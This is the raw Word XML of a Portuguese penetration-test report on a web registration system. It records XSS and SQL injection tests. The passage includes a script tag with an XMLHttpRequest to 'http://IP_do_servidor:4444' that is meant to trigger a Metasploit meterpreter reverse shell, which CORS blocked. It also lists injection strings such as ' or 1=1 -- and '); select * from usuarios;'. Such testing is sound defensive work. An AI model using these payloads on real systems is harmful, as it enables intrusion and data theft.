        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Mesmo aumentando o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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Explorar XSS – Tela Cadastro Lotes de </w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NomeSistema</w:t>
      </w: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s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Tarefa realizada dia 27/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 2 horas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Explorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de </w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s na Iteração 3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lastRenderedPageBreak/>
        <w:br/>
      </w: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sultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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1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A partir da máquina virtual que usa o Kali Linux, abrir uma conexão do </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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fazendo uso de um listener da ferramenta Metasploit para acessar o sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602EF" w:rsidP="00AC10DC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315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ab/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Passos</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executados</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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63043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Através do exploit disponível em </w:t>
      </w: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Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usar o Metasploit para abrir um listener na porta 444 da máquina virtual que usa o Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que usa Kali na porta indicada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Dessa forma, será criado um listener que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA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81DA5" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA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81DA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O código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="22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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="22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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="22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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,’http://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="22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6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.send();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8B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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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ab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Espera-se que a sessão do meterpreter não seja Aberta.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602EF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sultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.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O navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:tab/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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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4CA4C8A4" wp14:editId="68B21A6F">
            <wp:extent cx="5400040" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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26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777DD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Figura 24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– Erro exibido no navegador na execução da requisição usando o filtro de CORS.</w:t>
      </w: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2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Rodar o mesmo script utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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1 em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas no Iceweasel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602E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spera-se que a sessão do meterpreter não seja aberta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sultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.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Ao utilizar o navegador Firefox, o filtro de CORS impede a conexão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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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13AD12E2" wp14:editId="71BA138F">
            <wp:extent cx="5400040" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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26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777DD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Figura 25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– Navegador Firefox impede a conexão quando o filtro de CORS é utilizado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630433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Tela Cadastro Servidor – Exploração via SQL Injection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Tarefa realizada dia 26/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 1 hora e 30 minutos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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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de forçar ações não autorizadas no sistema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sultados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1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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples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846D4" w:rsidRPr="00F15F82" w:rsidRDefault="00B846D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Pr="00F15F82" w:rsidRDefault="00B846D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spera-se que o sistema realize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o tratamento do caractere aspa simples como um parâmetro regular da consulta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ntrada: teste ‘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  <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82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="00D76012"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. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome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”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 2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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários cadastrados. Comentários inline foram utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido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Entradas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teste ‘ or 1=1 --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teste ‘ or 1=1  #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B846D4" w:rsidRPr="00F15F82" w:rsidRDefault="00B846D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846D4" w:rsidRPr="00F15F82" w:rsidRDefault="00B846D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B846D4" w:rsidRPr="00F15F82" w:rsidRDefault="00B846D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Espera-se que o sistema realize o tratamento dos caracteres para impedir que os comentários inline sejam interpretados como parte da consulta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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.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 3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É possível que a tela utilize Javascript para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, o funcionamento do Javascript foi desabilitado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">no browser em utilização. Após isso foram repetidos os procedimentos das </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s 1 e 2.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Entradas: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">teste ‘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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 --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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 #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B846D4" w:rsidRPr="00F15F82" w:rsidRDefault="00B846D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Pr="00F15F82" w:rsidRDefault="00B846D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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o tratamento de todos os caracteres informados como parâmetros regulares da consulta</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B846D4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Nada aconteceu. Com o Javascript desabilitado no navegador a página não realizou nenhuma requisição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 4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Com a função de Javascript habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções SQL no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entradas: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1231 ); select * from usuarios; --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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>); select * from usuarios; #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8C6DC7" w:rsidRPr="00F15F82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Pr="00F15F82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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o tratamento de todos os caracteres informados como parâmetros regulares da consulta</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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Relatório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
